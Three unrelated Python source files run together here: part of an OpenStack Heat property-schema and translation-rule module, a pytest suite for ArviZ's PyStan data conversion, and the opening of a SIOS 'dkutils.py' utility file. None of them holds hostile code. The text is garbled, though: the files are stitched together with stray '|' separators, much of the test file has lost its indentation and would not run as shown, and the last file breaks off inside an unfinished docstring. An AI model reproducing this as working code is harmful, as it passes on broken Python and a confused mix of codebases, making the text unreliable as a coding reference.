        unknown = [k for k in schema_dict if k not in SCHEMA_KEYS]
        if unknown:
            raise exception.InvalidSchemaError(
                message=_('Unknown key(s) %s') % unknown)

        def constraints():
            # Generator yielding one constraint object per legacy
            # constraint-style key present in schema_dict.
            def get_num(key):
                val = schema_dict.get(key)
                if val is not None:
                    val = Schema.str_to_num(val)
                return val

            if MIN_VALUE in schema_dict or MAX_VALUE in schema_dict:
                yield constr.Range(get_num(MIN_VALUE), get_num(MAX_VALUE))
            if MIN_LENGTH in schema_dict or MAX_LENGTH in schema_dict:
                yield constr.Length(get_num(MIN_LENGTH), get_num(MAX_LENGTH))
            if ALLOWED_VALUES in schema_dict:
                yield constr.AllowedValues(schema_dict[ALLOWED_VALUES])
            if ALLOWED_PATTERN in schema_dict:
                yield constr.AllowedPattern(schema_dict[ALLOWED_PATTERN])

        try:
            data_type = schema_dict[TYPE]
        except KeyError:
            raise exception.InvalidSchemaError(
                message=_('No %s specified') % TYPE)

        # Nested schemas are only meaningful for lists (one sub-schema) and
        # maps (a dict of sub-schemas).
        if SCHEMA in schema_dict:
            if data_type == Schema.LIST:
                ss = cls.from_legacy(schema_dict[SCHEMA])
            elif data_type == Schema.MAP:
                schema_dicts = schema_dict[SCHEMA].items()
                ss = dict((n, cls.from_legacy(sd)) for n, sd in schema_dicts)
            else:
                raise exception.InvalidSchemaError(
                    message=_('%(schema)s supplied for %(type)s %(data)s') %
                    dict(schema=SCHEMA, type=TYPE, data=data_type))
        else:
            ss = None

        return cls(data_type,
                   description=schema_dict.get(DESCRIPTION),
                   default=schema_dict.get(DEFAULT),
                   schema=ss,
                   required=schema_dict.get(REQUIRED, False),
                   constraints=list(constraints()),
                   implemented=schema_dict.get(IMPLEMENTED, True),
                   update_allowed=schema_dict.get(UPDATE_ALLOWED, False),
                   immutable=schema_dict.get(IMMUTABLE, False))

    @classmethod
    def from_parameter(cls, param):
        """
        Return a Property Schema corresponding to a Parameter Schema.

        Convert a parameter schema from a provider template to a property
        Schema for the corresponding resource facade.
        """
        # map param types to property types
        param_type_map = {
            param.STRING: cls.STRING,
            param.NUMBER: cls.NUMBER,
            param.LIST: cls.LIST,
            param.MAP: cls.MAP,
            param.BOOLEAN: cls.BOOLEAN
        }

        # allow_conversion allows slightly more flexible type conversion
        # where property->parameter types don't align, primarily when
        # a json parameter value is passed via a Map property, which requires
        # some coercion to pass strings or lists (which are both valid for
        # Json parameters but not for Map properties).
        allow_conversion = param.type == param.MAP

        # make update_allowed true by default on TemplateResources
        # as the template should deal with this.
        return cls(data_type=param_type_map.get(param.type, cls.MAP),
                   description=param.description,
                   required=param.required,
                   constraints=param.constraints,
                   update_allowed=True,
                   immutable=False,
                   allow_conversion=allow_conversion,
                   default=param.default)

    def allowed_param_prop_type(self):
        """
        Return allowed type of Property Schema converted from parameter.

        Especially, when generating Schema from parameter, Integer Property
        Schema will be supplied by Number parameter.
        """
        param_type_map = {
            self.INTEGER: self.NUMBER,
            self.STRING: self.STRING,
            self.NUMBER: self.NUMBER,
            self.BOOLEAN: self.BOOLEAN,
            self.LIST: self.LIST,
            self.MAP: self.MAP
        }

        return param_type_map[self.type]

    def __getitem__(self, key):
        # Expose the two property-specific flags via mapping access; all
        # other keys are handled by the base constraints Schema.
        if key == self.UPDATE_ALLOWED:
            return self.update_allowed
        elif key == self.IMMUTABLE:
            return self.immutable
        else:
            return super(Schema, self).__getitem__(key)
def schemata(schema_dicts):
    """Return a dictionary of Schema objects for a dictionary of schemata.

    Each value is converted from the legacy (dictionary-based) format to a
    Schema object where necessary; existing Schema objects pass through.
    """
    return {name: Schema.from_legacy(spec)
            for name, spec in schema_dicts.items()}
class Property(object):
    """A single resource property: a Schema plus type-coercion helpers."""

    def __init__(self, schema, name=None, context=None):
        # Accept either a Schema object or a legacy dict.
        self.schema = Schema.from_legacy(schema)
        self.name = name
        self.context = context

    def required(self):
        return self.schema.required

    def implemented(self):
        return self.schema.implemented

    def update_allowed(self):
        return self.schema.update_allowed

    def immutable(self):
        return self.schema.immutable

    def has_default(self):
        # A default of None counts as "no default".
        return self.schema.default is not None

    def default(self):
        return self.schema.default

    def type(self):
        return self.schema.type

    def support_status(self):
        return self.schema.support_status

    def _get_integer(self, value):
        # NOTE: the `and/or` fallback idiom is safe here only because the
        # has_default() guard ensures default() is not None, and a falsy
        # default (0) coincides with the fallback value.
        if value is None:
            value = self.has_default() and self.default() or 0
        try:
            value = int(value)
        except ValueError:
            # Re-raised as TypeError to distinguish coercion failure.
            raise TypeError(_("Value '%s' is not an integer") % value)
        else:
            return value

    def _get_number(self, value):
        if value is None:
            value = self.has_default() and self.default() or 0
        return Schema.str_to_num(value)

    def _get_string(self, value):
        if value is None:
            value = self.has_default() and self.default() or ''
        if not isinstance(value, six.string_types):
            # Only bools and ints are silently stringified; anything else
            # (lists, dicts, floats) is rejected.
            if isinstance(value, (bool, int)):
                value = six.text_type(value)
            else:
                raise ValueError(_('Value must be a string'))
        return value

    def _get_children(self, child_values, keys=None, validate=False):
        # Recurse into a nested schema, wrapping the children in a
        # Properties collection; values without a sub-schema pass through.
        if self.schema.schema is not None:
            if keys is None:
                keys = list(self.schema.schema)
            schemata = dict((k, self.schema.schema[k]) for k in keys)
            properties = Properties(schemata, dict(child_values),
                                    context=self.context)
            if validate:
                properties.validate()

            return ((k, properties[k]) for k in keys)
        else:
            return child_values

    def _get_map(self, value, validate=False):
        if value is None:
            value = self.has_default() and self.default() or {}
        # NOTE(review): collections.Mapping/Sequence were removed from the
        # collections top level in Python 3.10 (use collections.abc) — this
        # module targets Py2/3 via six.
        if not isinstance(value, collections.Mapping):
            # This is to handle passing Lists via Json parameters exposed
            # via a provider resource, in particular lists-of-dicts which
            # cannot be handled correctly via comma_delimited_list
            if self.schema.allow_conversion:
                if isinstance(value, six.string_types):
                    return value
                elif isinstance(value, collections.Sequence):
                    return jsonutils.dumps(value)
            raise TypeError(_('"%s" is not a map') % value)

        return dict(self._get_children(six.iteritems(value),
                                       validate=validate))

    def _get_list(self, value, validate=False):
        if value is None:
            value = self.has_default() and self.default() or []
        # Strings are Sequences but must not be treated as lists.
        if (not isinstance(value, collections.Sequence) or
                isinstance(value, six.string_types)):
            raise TypeError(_('"%s" is not a list') % repr(value))

        return [v[1] for v in self._get_children(enumerate(value),
                                                 range(len(value)),
                                                 validate)]

    def _get_bool(self, value):
        if value is None:
            value = self.has_default() and self.default() or False
        if isinstance(value, bool):
            return value
        # Only the literal strings 'true'/'false' (any case) are accepted.
        normalised = value.lower()
        if normalised not in ['true', 'false']:
            raise ValueError(_('"%s" is not a valid boolean') % normalised)

        return normalised == 'true'

    def get_value(self, value, validate=False):
        """Get value from raw value and sanitize according to data type."""
        t = self.type()
        if t == Schema.STRING:
            _value = self._get_string(value)
        elif t == Schema.INTEGER:
            _value = self._get_integer(value)
        elif t == Schema.NUMBER:
            _value = self._get_number(value)
        elif t == Schema.MAP:
            _value = self._get_map(value, validate)
        elif t == Schema.LIST:
            _value = self._get_list(value, validate)
        elif t == Schema.BOOLEAN:
            _value = self._get_bool(value)

        # Constraint validation happens after type coercion.
        if validate:
            self.schema.validate_constraints(_value, self.context)

        return _value
class Properties(collections.Mapping):
    """A dict-like, lazily-resolved view over a resource's property values.

    Values are resolved through the supplied resolver function and coerced
    to the schema type on access (__getitem__).
    """

    def __init__(self, schema, data, resolver=lambda d: d, parent_name=None,
                 context=None, section=None):
        self.props = dict((k, Property(s, k, context))
                          for k, s in schema.items())
        self.resolve = resolver
        self.data = data
        # error_prefix accumulates path components (parent name, section)
        # used to build precise validation-error paths.
        self.error_prefix = []
        if parent_name is not None:
            self.error_prefix.append(parent_name)
        if section is not None:
            self.error_prefix.append(section)
        self.context = context

    @staticmethod
    def schema_from_params(params_snippet):
        """
        Convert a template snippet that defines parameters
        into a properties schema

        :param params_snippet: parameter definition from a template
        :returns: an equivalent properties schema for the specified params
        """
        if params_snippet:
            return dict((n, Schema.from_parameter(p)) for n, p
                        in params_snippet.items())
        return {}

    def validate(self, with_value=True):
        """Validate all properties against their schemas.

        :param with_value: when True, also resolve and type-check each value
            (not just the structural schema flags).
        :raises exception.StackValidationFailed: with a path locating the
            offending property.
        """
        try:
            # Reject any supplied key that has no schema entry.
            for key in self.data:
                if key not in self.props:
                    msg = _("Unknown Property %s") % key
                    raise exception.StackValidationFailed(message=msg)

            for (key, prop) in self.props.items():
                # check that update_allowed and immutable
                # do not contradict each other
                if prop.update_allowed() and prop.immutable():
                    msg = _("Property %(prop)s: %(ua)s and %(im)s "
                            "cannot both be True") % {
                                'prop': key,
                                'ua': prop.schema.UPDATE_ALLOWED,
                                'im': prop.schema.IMMUTABLE}
                    raise exception.InvalidSchemaError(message=msg)

                if with_value:
                    try:
                        self._get_property_value(key, validate=True)
                    except exception.StackValidationFailed as ex:
                        # Prepend this property's key to the child's path.
                        path = [key]
                        path.extend(ex.path)
                        raise exception.StackValidationFailed(
                            path=path, message=ex.error_message)
                    except ValueError as e:
                        # A missing required property is reported without a
                        # key path; other value errors point at the key.
                        if prop.required() and key not in self.data:
                            path = []
                        else:
                            path = [key]
                        raise exception.StackValidationFailed(
                            path=path, message=six.text_type(e))

                # are there unimplemented Properties
                if not prop.implemented() and key in self.data:
                    msg = _("Property %s not implemented yet") % key
                    raise exception.StackValidationFailed(message=msg)
        except exception.StackValidationFailed as ex:
            # NOTE(prazumovsky): should reraise exception for adding specific
            # error name and error_prefix to path for correct error message
            # building.
            path = self.error_prefix
            path.extend(ex.path)
            raise exception.StackValidationFailed(
                error=ex.error or 'Property error',
                path=path,
                message=ex.error_message
            )

    def _find_deps_any_in_init(self, unresolved_value):
        # True when any dependency of the (unresolved) value is a resource
        # still in its INIT action; implicitly returns None otherwise.
        deps = function.dependencies(unresolved_value)
        if any(res.action == res.INIT for res in deps):
            return True

    def _get_property_value(self, key, validate=False):
        if key not in self:
            raise KeyError(_('Invalid Property %s') % key)

        prop = self.props[key]

        if key in self.data:
            try:
                unresolved_value = self.data[key]
                if validate:
                    # Skip value validation when the value depends on a
                    # resource that has not been created yet.
                    if self._find_deps_any_in_init(unresolved_value):
                        validate = False

                value = self.resolve(unresolved_value)
                return prop.get_value(value, validate)
            # Children can raise StackValidationFailed with unique path which
            # is necessary for further use in StackValidationFailed exception.
            # So we need to handle this exception in this method.
            except exception.StackValidationFailed as e:
                raise exception.StackValidationFailed(path=e.path,
                                                      message=e.error_message)
            # the resolver function could raise any number of exceptions,
            # so handle this generically
            except Exception as e:
                raise ValueError(six.text_type(e))
        elif prop.has_default():
            return prop.get_value(None, validate)
        elif prop.required():
            raise ValueError(_('Property %s not assigned') % key)
        else:
            return None

    def __getitem__(self, key):
        return self._get_property_value(key)

    def __len__(self):
        return len(self.props)

    def __contains__(self, key):
        # Membership is defined by the schema, not by the supplied data.
        return key in self.props

    def __iter__(self):
        return iter(self.props)

    @staticmethod
    def _param_def_from_prop(schema):
        """
        Return a template parameter definition corresponding to a property.
        """
        param_type_map = {
            schema.INTEGER: parameters.Schema.NUMBER,
            schema.STRING: parameters.Schema.STRING,
            schema.NUMBER: parameters.Schema.NUMBER,
            schema.BOOLEAN: parameters.Schema.BOOLEAN,
            schema.MAP: parameters.Schema.MAP,
            schema.LIST: parameters.Schema.LIST,
        }

        def param_items():
            yield parameters.TYPE, param_type_map[schema.type]

            if schema.description is not None:
                yield parameters.DESCRIPTION, schema.description

            if schema.default is not None:
                yield parameters.DEFAULT, schema.default

            # Translate each property constraint to its cfn parameter form.
            for constraint in schema.constraints:
                if isinstance(constraint, constr.Length):
                    if constraint.min is not None:
                        yield parameters.MIN_LENGTH, constraint.min
                    if constraint.max is not None:
                        yield parameters.MAX_LENGTH, constraint.max
                elif isinstance(constraint, constr.Range):
                    if constraint.min is not None:
                        yield parameters.MIN_VALUE, constraint.min
                    if constraint.max is not None:
                        yield parameters.MAX_VALUE, constraint.max
                elif isinstance(constraint, constr.AllowedValues):
                    yield parameters.ALLOWED_VALUES, list(constraint.allowed)
                elif isinstance(constraint, constr.AllowedPattern):
                    yield parameters.ALLOWED_PATTERN, constraint.pattern

            # Booleans are passed as strings in cfn templates.
            if schema.type == schema.BOOLEAN:
                yield parameters.ALLOWED_VALUES, ['True', 'true',
                                                  'False', 'false']

        return dict(param_items())

    @staticmethod
    def _prop_def_from_prop(name, schema):
        """
        Return a provider template property definition for a property.
        """
        # Lists arrive as comma-delimited parameter strings and must be
        # split back into lists.
        if schema.type == Schema.LIST:
            return {'Fn::Split': [',', {'Ref': name}]}
        else:
            return {'Ref': name}

    @staticmethod
    def _hot_param_def_from_prop(schema):
        """
        Return parameter definition corresponding to a property for
        hot template.
        """
        param_type_map = {
            schema.INTEGER: hot_param.HOTParamSchema.NUMBER,
            schema.STRING: hot_param.HOTParamSchema.STRING,
            schema.NUMBER: hot_param.HOTParamSchema.NUMBER,
            schema.BOOLEAN: hot_param.HOTParamSchema.BOOLEAN,
            schema.MAP: hot_param.HOTParamSchema.MAP,
            schema.LIST: hot_param.HOTParamSchema.LIST,
        }

        def param_items():
            yield hot_param.HOTParamSchema.TYPE, param_type_map[schema.type]

            if schema.description is not None:
                yield hot_param.HOTParamSchema.DESCRIPTION, schema.description

            if schema.default is not None:
                yield hot_param.HOTParamSchema.DEFAULT, schema.default

            for constraint in schema.constraints:
                # HOT uses a single min/max pair for both length and range.
                if (isinstance(constraint, constr.Length) or
                        isinstance(constraint, constr.Range)):
                    if constraint.min is not None:
                        yield hot_param.MIN, constraint.min
                    if constraint.max is not None:
                        yield hot_param.MAX, constraint.max
                elif isinstance(constraint, constr.AllowedValues):
                    yield hot_param.ALLOWED_VALUES, list(constraint.allowed)
                elif isinstance(constraint, constr.AllowedPattern):
                    yield hot_param.ALLOWED_PATTERN, constraint.pattern

            if schema.type == schema.BOOLEAN:
                yield hot_param.ALLOWED_VALUES, ['True', 'true',
                                                 'False', 'false']

        return dict(param_items())

    @staticmethod
    def _hot_prop_def_from_prop(name, schema):
        """
        Return a provider template property definition for a property.
        """
        return {'get_param': name}

    @classmethod
    def schema_to_parameters_and_properties(cls, schema, template_type='cfn'):
        """Generates properties with params resolved for a resource's
        properties_schema.

        :param schema: A resource type's properties_schema
        :param template_type: 'cfn' or 'hot', selecting the output dialect
        :returns: A tuple of params and properties dicts

        ex: input:  {'foo': {'Type': 'List'}}
            output: {'foo': {'Type': 'CommaDelimitedList'}},
                    {'foo': {'Fn::Split': {'Ref': 'foo'}}}

        ex: input:  {'foo': {'Type': 'String'}, 'bar': {'Type': 'Map'}}
            output: {'foo': {'Type': 'String'}, 'bar': {'Type': 'Json'}},
                    {'foo': {'Ref': 'foo'}, 'bar': {'Ref': 'bar'}}
        """
        def param_prop_def_items(name, schema, template_type):
            if template_type == 'hot':
                param_def = cls._hot_param_def_from_prop(schema)
                prop_def = cls._hot_prop_def_from_prop(name, schema)
            else:
                param_def = cls._param_def_from_prop(schema)
                prop_def = cls._prop_def_from_prop(name, schema)

            return (name, param_def), (name, prop_def)

        if not schema:
            return {}, {}

        # Unimplemented properties are omitted from the generated facade.
        param_prop_defs = [param_prop_def_items(n, s, template_type)
                           for n, s in six.iteritems(schemata(schema))
                           if s.implemented]
        param_items, prop_items = zip(*param_prop_defs)
        return dict(param_items), dict(prop_items)
class TranslationRule(object):
    """Translating mechanism one properties to another.

    Mechanism uses list of rules, each defines by this class, and can be
    executed. Working principe: during resource creating after properties
    defining resource take list of rules, specified by method
    translation_rules, which should be overloaded for each resource, if it's
    needed, and execute each rule using translate_properties method. Next
    operations are allowed:

    - ADD. This rule allows to add some value to list-type properties. Only
      list-type values can be added to such properties. Using for other
      cases is prohibited and will be returned with error.
    - REPLACE. This rule allows to replace some property value to another. Used
      for all types of properties. Note, that if property has list type, then
      value will be replaced for all elements of list, where it needed. If
      element in such property must be replaced by value of another element of
      this property, value_name must be defined.
    - DELETE. This rule allows to delete some property. If property has list
      type, then deleting affects value in all list elements.
    """

    RULE_KEYS = (ADD, REPLACE, DELETE) = ('Add', 'Replace', 'Delete')

    def __init__(self, properties, rule, source_path, value=None,
                 value_name=None, value_path=None):
        """Add new rule for translating mechanism.

        :param properties: properties of resource
        :param rule: rule from RULE_KEYS
        :param source_path: list with path to property, which value will be
               affected in rule.
        :param value: value which will be involved in rule
        :param value_name: value_name which used for replacing properties
               inside list-type properties.
        :param value_path: path to value, which should be used for translation.
        """
        self.properties = properties
        self.rule = rule
        self.source_path = source_path
        # NOTE(review): `value or None` collapses any falsy value ([], 0, '')
        # to None — presumably intentional for "no value supplied", but a
        # legitimate falsy replacement value would be lost; confirm callers.
        self.value = value or None
        self.value_name = value_name
        self.value_path = value_path

        # Fail fast on malformed rules.
        self.validate()

    def validate(self):
        """Check rule kind, argument types and rule/argument combinations."""
        if self.rule not in self.RULE_KEYS:
            raise ValueError(_('There is no rule %(rule)s. List of allowed '
                               'rules is: %(rules)s.') % {
                                   'rule': self.rule,
                                   'rules': ', '.join(self.RULE_KEYS)})
        elif not isinstance(self.properties, Properties):
            raise ValueError(_('Properties must be Properties type. '
                               'Found %s.') % type(self.properties))
        elif not isinstance(self.source_path, list):
            raise ValueError(_('source_path should be a list with path '
                               'instead of %s.') % type(self.source_path))
        elif len(self.source_path) == 0:
            raise ValueError(_('source_path must be non-empty list with '
                               'path.'))
        elif self.value_name and self.rule != self.REPLACE:
            raise ValueError(_('Use value_name only for replacing list '
                               'elements.'))
        elif self.rule == self.ADD and not isinstance(self.value, list):
            raise ValueError(_('value must be list type when rule is ADD.'))

    def execute_rule(self):
        """Apply this rule, mutating the underlying properties data."""
        (source_key, source_data) = self.get_data_from_source_path(
            self.source_path)
        if self.value_path:
            # The replacement value may itself come from another property.
            (value_key, value_data) = self.get_data_from_source_path(
                self.value_path)
            value = (value_data[value_key]
                     if value_data and value_data.get(value_key)
                     else self.value)
        else:
            (value_key, value_data) = None, None
            value = self.value

        # Nothing to do when the source is absent, or (for ADD/REPLACE)
        # when no usable value could be determined.
        if (source_data is None or (self.rule != self.DELETE and
                                    (value is None and
                                     self.value_name is None and
                                     (value_data is None or
                                      value_data.get(value_key) is None)))):
            return

        if self.rule == TranslationRule.ADD:
            if isinstance(source_data, list):
                source_data.extend(value)
            else:
                raise ValueError(_('ADD rule must be used only for '
                                   'lists.'))
        elif self.rule == TranslationRule.REPLACE:
            if isinstance(source_data, list):
                # Apply the replacement to every element of the list.
                for item in source_data:
                    if item.get(self.value_name) and item.get(source_key):
                        raise ValueError(_('Cannot use %(key)s and '
                                           '%(name)s at the same time.')
                                         % dict(key=source_key,
                                                name=self.value_name))
                    elif item.get(self.value_name) is not None:
                        # Move the value from value_name to source_key.
                        item[source_key] = item[self.value_name]
                        del item[self.value_name]
                    elif value is not None:
                        item[source_key] = value
            else:
                if (source_data and source_data.get(source_key) and
                        value_data and value_data.get(value_key)):
                    raise ValueError(_('Cannot use %(key)s and '
                                       '%(name)s at the same time.')
                                     % dict(key=source_key,
                                            name=value_key))
                source_data[source_key] = value
        elif self.rule == TranslationRule.DELETE:
            if isinstance(source_data, list):
                for item in source_data:
                    if item.get(source_key) is not None:
                        del item[source_key]
            else:
                del source_data[source_key]

    def get_data_from_source_path(self, path):
        """Walk *path* through the raw property data.

        :returns: (final_key, containing_data) — the last path component and
                  the dict/list that holds it, or (None, None) when the path
                  is absent and the rule does not require creating it.
        """
        def get_props(props, key):
            # Descend one level in the schema alongside the data.
            props = props.get(key)
            if props.schema.schema is not None:
                keys = list(props.schema.schema)
                schemata = dict((k, props.schema.schema[k])
                                for k in keys)
                props = dict((k, Property(s, k))
                             for k, s in schemata.items())
            return props

        source_key = path[0]
        data = self.properties.data
        props = self.properties.props
        for key in path:
            if isinstance(data, list):
                source_key = key
            elif data.get(key) is not None and isinstance(data.get(key),
                                                          (list, dict)):
                data = data.get(key)
                props = get_props(props, key)
            elif data.get(key) is None:
                if (self.rule == TranslationRule.DELETE or
                        (self.rule == TranslationRule.REPLACE and
                         self.value_name)):
                    return None, None
                elif props.get(key).type() == Schema.LIST:
                    # Materialise missing containers so ADD/REPLACE can
                    # write into them.
                    data[key] = []
                elif props.get(key).type() == Schema.MAP:
                    data[key] = {}
                else:
                    source_key = key
                    continue
                data = data.get(key)
                props = get_props(props, key)
            else:
                source_key = key
        return source_key, data
| |
# pylint: disable=no-member, invalid-name, redefined-outer-name, too-many-function-args
import importlib
from collections import OrderedDict
import numpy as np
import pytest
from ... import from_pystan
from ...data.io_pystan import get_draws, get_draws_stan3 # pylint: disable=unused-import
from ..helpers import ( # pylint: disable=unused-import
chains,
check_multiple_attrs,
draws,
eight_schools_params,
importorskip,
load_cached_models,
pystan_version,
running_on_ci,
)
# Check if either pystan or pystan3 is installed
pystan_installed = (importlib.util.find_spec("pystan") is not None) or (
    importlib.util.find_spec("stan") is not None
)
# Skip the whole module unless a PyStan flavour is available or we are on CI
# (presumably so a broken CI install fails loudly instead of silently
# skipping — TODO confirm).
pytestmark = pytest.mark.skipif(
    not (pystan_installed | running_on_ci()),
    reason="test requires pystan/pystan3 which is not installed",
)
class TestDataPyStan:
    @pytest.fixture(scope="class")
    def data(self, eight_schools_params, draws, chains):
        """Class-scoped fixture exposing the cached PyStan model and fit."""
        # Wrap the cached (model, fit) pair in a class namespace so tests
        # can refer to data.model / data.obj.
        class Data:
            model, obj = load_cached_models(eight_schools_params, draws, chains, "pystan")["pystan"]

        return Data
    def get_inference_data(self, data, eight_schools_params):
        """vars as str."""
        # Build an InferenceData with every optional group populated, each
        # variable given as a plain string. Some groups deliberately reuse
        # posterior variables — wrong semantically, but fine for I/O tests.
        return from_pystan(
            posterior=data.obj,
            posterior_predictive="y_hat",
            predictions="y_hat",  # wrong, but fine for testing
            prior=data.obj,
            prior_predictive="y_hat",
            observed_data="y",
            constant_data="sigma",
            predictions_constant_data="sigma",  # wrong, but fine for testing
            log_likelihood={"y": "log_lik"},
            coords={"school": np.arange(eight_schools_params["J"])},
            dims={
                "theta": ["school"],
                "y": ["school"],
                "sigma": ["school"],
                "y_hat": ["school"],
                "eta": ["school"],
            },
            posterior_model=data.model,
            prior_model=data.model,
        )
    def get_inference_data2(self, data, eight_schools_params):
        """vars as lists."""
        # Same conversion as get_inference_data, but variable names are
        # passed as single-element lists and log_likelihood as a plain str.
        return from_pystan(
            posterior=data.obj,
            posterior_predictive=["y_hat"],
            predictions=["y_hat"],  # wrong, but fine for testing
            prior=data.obj,
            prior_predictive=["y_hat"],
            observed_data=["y"],
            log_likelihood="log_lik",
            coords={
                "school": np.arange(eight_schools_params["J"]),
                "log_likelihood_dim": np.arange(eight_schools_params["J"]),
            },
            dims={
                "theta": ["school"],
                "y": ["school"],
                "y_hat": ["school"],
                "eta": ["school"],
                "log_lik": ["log_likelihood_dim"],
            },
            posterior_model=data.model,
            prior_model=data.model,
        )
def get_inference_data3(self, data, eight_schools_params):
"""multiple vars as lists."""
return from_pystan(
posterior=data.obj,
posterior_predictive=["y_hat", "log_lik"], # wrong, but fine for testing
predictions=["y_hat", "log_lik"], # wrong, but fine for testing
prior=data.obj,
prior_predictive=["y_hat", "log_lik"], # wrong, but fine for testing
constant_data=["sigma", "y"], # wrong, but fine for testing
predictions_constant_data=["sigma", "y"], # wrong, but fine for testing
coords={"school": np.arange(eight_schools_params["J"])},
dims={
"theta": ["school"],
"y": ["school"],
"sigma": ["school"],
"y_hat": ["school"],
"eta": ["school"],
},
posterior_model=data.model,
prior_model=data.model,
)
def get_inference_data4(self, data):
"""minimal input."""
return from_pystan(
posterior=data.obj,
posterior_predictive=None,
prior=data.obj,
prior_predictive=None,
coords=None,
dims=None,
posterior_model=data.model,
log_likelihood=[],
prior_model=data.model,
save_warmup=pystan_version() == 2,
)
def get_inference_data5(self, data):
"""minimal input."""
return from_pystan(
posterior=data.obj,
posterior_predictive=None,
prior=data.obj,
prior_predictive=None,
coords=None,
dims=None,
posterior_model=data.model,
log_likelihood=False,
prior_model=data.model,
save_warmup=pystan_version() == 2,
dtypes={"eta": int},
)
def test_sampler_stats(self, data, eight_schools_params):
inference_data = self.get_inference_data(data, eight_schools_params)
test_dict = {"sample_stats": ["diverging"]}
fails = check_multiple_attrs(test_dict, inference_data)
assert not fails
def test_inference_data(self, data, eight_schools_params):
inference_data1 = self.get_inference_data(data, eight_schools_params)
inference_data2 = self.get_inference_data2(data, eight_schools_params)
inference_data3 = self.get_inference_data3(data, eight_schools_params)
inference_data4 = self.get_inference_data4(data)
inference_data5 = self.get_inference_data5(data)
# inference_data 1
test_dict = {
"posterior": ["theta", "~log_lik"],
"posterior_predictive": ["y_hat"],
"predictions": ["y_hat"],
"observed_data": ["y"],
"constant_data": ["sigma"],
"predictions_constant_data": ["sigma"],
"sample_stats": ["diverging", "lp"],
"log_likelihood": ["y", "~log_lik"],
"prior": ["theta"],
}
fails = check_multiple_attrs(test_dict, inference_data1)
assert not fails
# inference_data 2
test_dict = {
"posterior_predictive": ["y_hat"],
"predictions": ["y_hat"],
"observed_data": ["y"],
"sample_stats_prior": ["diverging"],
"sample_stats": ["diverging", "lp"],
"log_likelihood": ["log_lik"],
"prior_predictive": ["y_hat"],
}
fails = check_multiple_attrs(test_dict, inference_data2)
assert not fails
assert any(
item in inference_data2.posterior.attrs for item in ["stan_code", "program_code"]
)
assert any(
item in inference_data2.sample_stats.attrs for item in ["stan_code", "program_code"]
)
# inference_data 3
test_dict = {
"posterior_predictive": ["y_hat", "log_lik"],
"predictions": ["y_hat", "log_lik"],
"constant_data": ["sigma", "y"],
"predictions_constant_data": ["sigma", "y"],
"sample_stats_prior": ["diverging"],
"sample_stats": ["diverging", "lp"],
"log_likelihood": ["log_lik"],
"prior_predictive": ["y_hat", "log_lik"],
}
fails = check_multiple_attrs(test_dict, inference_data3)
assert not fails
# inference_data 4
test_dict = {
"posterior": ["theta"],
"prior": ["theta"],
"sample_stats": ["diverging", "lp"],
"~log_likelihood": [""],
}
if pystan_version() == 2:
test_dict.update(
{"warmup_posterior": ["theta"], "warmup_sample_stats": ["diverging", "lp"]}
)
fails = check_multiple_attrs(test_dict, inference_data4)
assert not fails
# inference_data 5
test_dict = {
"posterior": ["theta"],
"prior": ["theta"],
"sample_stats": ["diverging", "lp"],
"~log_likelihood": [""],
}
if pystan_version() == 2:
test_dict.update(
{"warmup_posterior": ["theta"], "warmup_sample_stats": ["diverging", "lp"]}
)
fails = check_multiple_attrs(test_dict, inference_data5)
assert not fails
assert inference_data5.posterior.eta.dtype.kind == "i"
def test_invalid_fit(self, data):
if pystan_version() == 2:
model = data.model
model_data = {
"J": 8,
"y": np.array([28.0, 8.0, -3.0, 7.0, -1.0, 1.0, 18.0, 12.0]),
"sigma": np.array([15.0, 10.0, 16.0, 11.0, 9.0, 11.0, 10.0, 18.0]),
}
fit_test_grad = model.sampling(
data=model_data, test_grad=True, check_hmc_diagnostics=False
)
with pytest.raises(AttributeError):
_ = from_pystan(posterior=fit_test_grad)
fit = model.sampling(data=model_data, iter=100, chains=1, check_hmc_diagnostics=False)
del fit.sim["samples"]
with pytest.raises(AttributeError):
_ = from_pystan(posterior=fit)
def test_empty_parameter(self):
model_code = """
parameters {
real y;
vector[3] x;
vector[0] a;
vector[2] z;
}
model {
y ~ normal(0,1);
}
"""
if pystan_version() == 2:
from pystan import StanModel # pylint: disable=import-error
model = StanModel(model_code=model_code)
fit = model.sampling(iter=500, chains=2, check_hmc_diagnostics=False)
else:
import stan # pylint: disable=import-error
model = stan.build(model_code)
fit = model.sample(num_samples=500, num_chains=2)
posterior = from_pystan(posterior=fit)
test_dict = {"posterior": ["y", "x", "z", "~a"], "sample_stats": ["diverging"]}
fails = check_multiple_attrs(test_dict, posterior)
assert not fails
def test_get_draws(self, data):
fit = data.obj
if pystan_version() == 2:
draws, _ = get_draws(fit, variables=["theta", "theta"])
assert draws.get("theta") is not None
else:
draws = get_draws_stan3(fit, variables=["theta", "theta"])
assert draws.get("theta") is not None
@pytest.mark.skipif(pystan_version() != 2, reason="PyStan 2.x required")
def test_index_order(self, data, eight_schools_params):
"""Test 0-indexed data."""
# Skip test if pystan not installed
pystan = importorskip("pystan") # pylint: disable=import-error
fit = data.model.sampling(data=eight_schools_params)
if pystan.__version__ >= "2.18":
# make 1-indexed to 0-indexed
for holder in fit.sim["samples"]:
new_chains = OrderedDict()
for i, (key, values) in enumerate(holder.chains.items()):
if "[" in key:
name, *shape = key.replace("]", "").split("[")
shape = [str(int(item) - 1) for items in shape for item in items.split(",")]
key = name + f"[{','.join(shape)}]"
new_chains[key] = np.full_like(values, fill_value=float(i))
setattr(holder, "chains", new_chains)
fit.sim["fnames_oi"] = list(fit.sim["samples"][0].chains.keys())
idata = from_pystan(posterior=fit)
assert idata is not None
for j, fpar in enumerate(fit.sim["fnames_oi"]):
par, *shape = fpar.replace("]", "").split("[")
if par in {"lp__", "log_lik"}:
continue
assert hasattr(idata.posterior, par), (par, list(idata.posterior.data_vars))
if shape:
shape = [slice(None), slice(None)] + list(map(int, shape))
assert idata.posterior[par][tuple(shape)].values.mean() == float(j)
else:
assert idata.posterior[par].values.mean() == float(j)
| |
#-------------------------------------------------------------------------------
# Name: dkutils.py
#-------------------------------------------------------------------------------
from __future__ import with_statement
__author__ = "Travis Goldie"
__email__ = "test_automation@us.sios.com"
__date__ = "11/14/12"
__copyright__ = "(c) SIOS Technology Corp 2012"
import collections
import hashlib
import imp
import inspect
import itertools
import logging
import os
import re
import subprocess
import sys
from copy import deepcopy
#The try statement is needed when using different versions of Python.
#For Example using both Cpython 3.2 and IronPython 2.7
try:
from configparser import ConfigParser, ExtendedInterpolation
import ast
except ImportError:
from ConfigParser import ConfigParser
import _ast as ast
#-------------------------------------------------------------------------------
# Internal Utils
#-------------------------------------------------------------------------------
def cleanValue(val):
    """
    Purpose:
